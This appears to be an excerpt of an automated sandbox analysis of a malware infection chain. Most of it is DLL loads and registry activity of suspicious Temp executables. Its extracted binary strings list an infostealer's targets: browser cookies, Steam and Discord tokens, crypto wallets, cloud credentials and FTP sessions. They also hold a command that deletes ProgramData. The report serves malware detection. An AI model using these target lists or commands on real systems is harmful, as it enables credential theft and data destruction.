Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\choice.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: jscript.dll
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Section loaded: version.dll
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1052838001\LCESjzR.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1052838001\LCESjzR.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\is-J61GD.tmp\LCESjzR.tmp Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\is-J61GD.tmp\LCESjzR.tmp Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\is-J61GD.tmp\LCESjzR.tmp Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\is-J61GD.tmp\LCESjzR.tmp Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\is-J61GD.tmp\LCESjzR.tmp Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\is-J61GD.tmp\LCESjzR.tmp Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\is-J61GD.tmp\LCESjzR.tmp Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Temp\is-J61GD.tmp\LCESjzR.tmp Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\is-J61GD.tmp\LCESjzR.tmp Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\is-J61GD.tmp\LCESjzR.tmp Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\is-J61GD.tmp\LCESjzR.tmp Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\is-J61GD.tmp\LCESjzR.tmp Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\is-J61GD.tmp\LCESjzR.tmp Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\is-J61GD.tmp\LCESjzR.tmp Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\is-J61GD.tmp\LCESjzR.tmp Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-J61GD.tmp\LCESjzR.tmp Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\is-J61GD.tmp\LCESjzR.tmp Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-J61GD.tmp\LCESjzR.tmp Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-J61GD.tmp\LCESjzR.tmp Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-J61GD.tmp\LCESjzR.tmp Section loaded: dwmapi.dll
Source: C:\Users\user\AppData\Local\Temp\is-J61GD.tmp\LCESjzR.tmp Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\is-J61GD.tmp\LCESjzR.tmp Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\is-J61GD.tmp\LCESjzR.tmp Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\is-J61GD.tmp\LCESjzR.tmp Section loaded: sfc.dll
Source: C:\Users\user\AppData\Local\Temp\is-J61GD.tmp\LCESjzR.tmp Section loaded: sfc_os.dll
Source: C:\Users\user\AppData\Local\Temp\is-J61GD.tmp\LCESjzR.tmp Section loaded: explorerframe.dll
Source: C:\Users\user\AppData\Local\Temp\is-J61GD.tmp\LCESjzR.tmp Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\is-9JA86.tmp\driver3.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\is-9JA86.tmp\driver3.exe Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\is-9JA86.tmp\driver3.exe Section loaded: vcruntime140.dll
Source: C:\Users\user\AppData\Local\Temp\is-9JA86.tmp\driver3.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\is-9JA86.tmp\driver3.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\is-9JA86.tmp\driver3.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\is-9JA86.tmp\driver3.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\is-9JA86.tmp\driver3.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\is-9JA86.tmp\driver3.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\is-9JA86.tmp\driver3.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\is-9JA86.tmp\driver3.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\is-9JA86.tmp\driver3.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\is-9JA86.tmp\driver3.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\is-9JA86.tmp\driver3.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\is-9JA86.tmp\driver3.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\is-9JA86.tmp\driver3.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\is-9JA86.tmp\driver3.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\is-9JA86.tmp\driver3.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\is-9JA86.tmp\driver3.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\is-9JA86.tmp\driver3.exe Section loaded: cryptnet.dll
Source: C:\Users\user\AppData\Local\Temp\is-9JA86.tmp\driver3.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Section loaded: dbghelp.dll
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wersvc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: windowsperformancerecordercontrol.dll
Source: C:\Windows\System32\svchost.exe Section loaded: weretw.dll
Source: C:\Windows\System32\svchost.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wer.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: faultrep.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dbgcore.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wer.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\SysWOW64\mshta.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\mshta.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-J61GD.tmp\LCESjzR.tmp Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner
Source: C:\Users\user\AppData\Local\Temp\is-J61GD.tmp\LCESjzR.tmp Window found: window name: TWizardForm
Source: C:\Users\user\AppData\Local\Temp\is-J61GD.tmp\LCESjzR.tmp Automated click: Next
Source: C:\Users\user\AppData\Local\Temp\is-J61GD.tmp\LCESjzR.tmp Automated click: OK
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-SQAGT.tmp\stail.tmp Registry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Cross-platform Player_is1
Source: Binary string: vdr1.pdb source: ugdKEDU.exe, 0000001F.00000002.3022168712.0000000003C19000.00000004.00000800.00020000.00000000.sdmp, ugdKEDU.exe, 00000022.00000002.3495642372.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Source: Binary string: A{"id":1,"method":"Storage.getCookies"}|.tgz.gzSecurityHistoryWork Dir: In memorySOFTWARE\Microsoft\Cryptographyfirefox%08lX%04lX%lu_key.txtSoft\Steam\steam_tokens.txt\Discord\tokens.txtpasswords.txtinformation.txtlocalhostWebSocketClient" & exitGdipGetImageHeightSoftGdipGetImagePixelFormatN0ZWFt\Monero\wallet.keysAzure\.awsstatusWallets_CreateProcessGdipGetImageEncodershttpsSoftware\Martin Prikryl\WinSCP 2\SessionsPlugins/devtoolsprefs.jsLocal Extension SettingsSync Extension SettingsFilescookiesCookies\BraveWallet\Preferenceskey_datas%s\%s\%sPortNumberCurrentBuildNumberGdiplusStartup.zipGdipCreateHBITMAPFromBitmapOpera Crypto.zooUnknownGdiplusShutdown/json_logins.jsoninvalid string positionSoftware\Martin Prikryl\WinSCP 2\ConfigurationDisplayVersionSOFTWARE\Microsoft\Windows NT\CurrentVersionopentokenamcommunity.comTelegramSoftware\Valve\SteamGdipSaveImageToStreamGdipLoadImageFromStream\AppData\Roaming\FileZilla\recentservers.xml.dllSOFTWARE\Microsoft\Windows\CurrentVersion\Uninstallapprove_aprilNetworkblock.arjprofiles.ini.lzhGdipGetImageWidthwallet_pathSteamPathscreenshot.jpgstring too longvector<T> too longProcessorNameStringloginusers.vdflibraryfolders.vdfconfig.vdfDialogConfig.vdfDialogConfigOverlay*.vdfGdipGetImageEncodersSizesteam.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\cmd.exeC:\Windows\system32\rundll32.exeBravetrueformhistory.sqlitecookies.sqliteplaces.sqliteLocal StatefalseAzure\.azureSOFTWARE\monero-project\monero-corechromefile_nameDisplayNameHostNameProductNameUserNameGdipSaveImageToFilemsal.cacheGdipDisposeImagemodeAzure\.IdentityServiceUseMasterPasswordhwidMachineGuidtask_idbuild_idCrash DetectedDisabled%dx%d%d/%d/%d %d:%d:%d.arcvdr1.pdb\Local Storage\leveldb_0.indexeddb.leveldb_formhistory.db_history.db_cookies.db_passwords.db_webdata.db_key4.db\key4.dbfile_dataLogin DataWeb DataoperaOperachrome-extension_[Processes][Software]\storage\default\\.aws\errors\\Telegram Desktop\\Steam\\config\\.azure\ Stable\\.IdentityService\\discord\/c timeout /t 10 & rd /s /q "C:\ProgramData\" & rd /s /q "C:\ProgramData\\..\.ZDISPLAYOpera GXEXCEPTION_INT_OVERFLOWEXCEPTION_FLT_OVERFLOWEXCEPTION_STACK_OVERFLOWEXCEPTION_FLT_UNDERFLOWPOSTEXCEPTION_BREAKPOINT\Local Storage\leveldb\CURRENTEXCEPTION_DATATYPE_MISALIGNMENTEXCEPTION_FLT_INEXACT_RESULTGETEXCEPTION_IN_PAGE_ERRORdQw4w9WgXcQEXCEPTION_SINGLE_STEPGdipCreateBitmapFromHBITMAPEXCEPTION_INT_DIVIDE_BY_ZEROEXCEPTION_FLT_DIVIDE_BY_ZEROEXCEPTION_NONCONTINUABLE_EXCEPTIONUNKNOWN EXCEPTIONEXCEPTION_INVALID_DISPOSITIONEXCEPTION_PRIV_INSTRUCTIONEXCEPTION_ILLEGAL_INSTRUCTIONEXCEPTION_FLT_INVALID_OPERATIONEXCEPTION_ACCESS_VIOLATIONEXCEPTION_FLT_STACK_CHECKEXCEPTION_FLT_DENORMAL_OPERANDEXCEPTION_ARRAY_BOUNDS_EXCEEDED%d MBIndexedDBOCALAPPDATA?<Host><Port><User><Pass encoding="base64">http://localhost:"webSocketDebuggerUrl":6^userContextId=4294967295465 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73ws://localhost:9223.metadata-v2:22.ps15121Windows 11HTTP/1.1HARDWA
Source: Binary string: signatureAlgorithmcertsOCSP_SIGNATUREhashAlgorithmissuerNameHashissuerKeyHashOCSP_CERTIDreqCertsingleRequestExtensionsOCSP_ONEREQrequestorNamerequestListrequestExtensionsOCSP_REQINFOtbsRequestoptionalSignatureOCSP_REQUESTresponseTyperesponseOCSP_RESPBYTESresponseStatusresponseBytesOCSP_RESPONSEvalue.byNamevalue.byKeyOCSP_RESPIDrevocationTimerevocationReasonOCSP_REVOKEDINFOvalue.goodvalue.revokedvalue.unknownOCSP_CERTSTATUScertIdcertStatusthisUpdatenextUpdatesingleExtensionsOCSP_SINGLERESPresponderIdproducedAtresponsesresponseExtensionsOCSP_RESPDATAtbsResponseDataOCSP_BASICRESPcrlUrlcrlNumcrlTimeOCSP_CRLIDlocatorOCSP_SERVICELOCcompiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG"OpenSSL 3.4.0 22 Oct 2024built on: Sun Jan 19 01:49:05 2025 UTCplatform: VC-WIN64AOPENSSLDIR: "C:\12\decryptor\target\release\build\openssl-sys-da6622e085c0367c\out\openssl-build\install\SYSANAGER:[OPENSSL]"userSDIR: "C:\12\decryptor\target\release\build\openssl-sys-da6622e085c0367c\out\openssl-build\install\lib\users-3"MODULESDIR: "C:\12\decryptor\target\release\build\openssl-sys-da6622e085c0367c\out\openssl-build\install\lib\ossl-modules"CPUINFO: N/AOSSL_WINCTX: Undefinednot availableevp_pkey_asym_cipher_initcrypto\evp\asymcipher.cEVP_PKEY_encryptEVP_PKEY_decryptevp_asym_cipher_from_algorithmcrypto\evp\pmeth_lib.cint_ctx_newEVP_PKEY_CTX_dupEVP_PKEY_CTX_get_signature_mdevp_pkey_ctx_set_mdevp_pkey_ctx_set1_octet_stringsecretpassnpmaxmem_bytesoperationevp_pkey_ctx_ctrl_intEVP_PKEY_CTX_ctrlevp_pkey_ctx_ctrl_str_intdistidhexdistidevp_pkey_ctx_store_cached_dataEVP_PKEY_CTX_md source: driver3.exe, 00000020.00000002.3346748725.00007FF7C00B5000.00000002.00000001.01000000.00000017.sdmp, driver3.exe, 00000020.00000000.2961620464.00007FF7C00B5000.00000002.00000001.01000000.00000017.sdmp
Source: Binary string: decryptor.pdb source: driver3.exe, 00000020.00000000.2961620464.00007FF7C01A6000.00000002.00000001.01000000.00000017.sdmp
Source: Binary string: methodlocationACCESS_DESCRIPTIONAUTHORITY_INFO_ACCESSi2v_AUTHORITY_INFO_ACCESScrypto\x509\v3_info.c%s - %sv2i_AUTHORITY_INFO_ACCESScompiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG";CPUINFO: OPENSSL_ia32cap=0x%llx:0x%llxOPENSSL_ia32cap env:%sos-specific.dllCPUINFO: source: driver3.exe, 00000020.00000002.3346748725.00007FF7C00B5000.00000002.00000001.01000000.00000017.sdmp, driver3.exe, 00000020.00000000.2961620464.00007FF7C00B5000.00000002.00000001.01000000.00000017.sdmp
Source: Binary string: Excited.pdb source: ugdKEDU.exe, 0000001F.00000000.2957620541.0000000000892000.00000002.00000001.01000000.00000015.sdmp, ugdKEDU.exe, 0000001F.00000002.3022168712.0000000003C19000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG" source: driver3.exe, 00000020.00000002.3346748725.00007FF7C00B5000.00000002.00000001.01000000.00000017.sdmp, driver3.exe, 00000020.00000000.2961620464.00007FF7C00B5000.00000002.00000001.01000000.00000017.sdmp

Data Obfuscation

barindex
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE Unpacked PE file: 3.2.TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE.b50000.0.unpack :EW;.rsrc:W;.idata :W; :EW;hxbwlokj:EW;fwohzanq:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;hxbwlokj:EW;fwohzanq:EW;.taggant:EW;
